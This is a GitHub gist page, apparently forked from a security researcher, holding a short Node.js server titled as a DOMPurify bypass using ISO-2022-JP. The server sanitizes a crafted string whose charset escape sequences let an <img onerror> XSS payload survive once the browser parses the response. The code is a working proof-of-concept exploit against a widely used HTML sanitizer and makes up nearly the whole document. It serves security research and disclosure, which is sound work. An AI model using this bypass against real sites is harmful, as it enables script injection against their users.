Skip to content

Instantly share code, notes, and snippets.

@gavz

gavz/app.js

Forked from kevin-mizu/app.js
Created July 17, 2024 19:05
Show Gist options
  • Save gavz/b43521f4e9c00b62d61cd347ee0bd0f7 to your computer and use it in GitHub Desktop.
Save gavz/b43521f4e9c00b62d61cd347ee0bd0f7 to your computer and use it in GitHub Desktop.
Download ZIP
DOMPurify bypass using ISO-2022-JP
Raw
app.js
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");
const server = http.createServer((req, res) => {
const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
res.statusCode = 200;
res.setHeader("Content-Type", "text/html");
res.end(clean);
});
const PORT = process.env.PORT || 3000;
server.listen(PORT, () => {
console.log(`Server is running on port ${PORT}`);
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment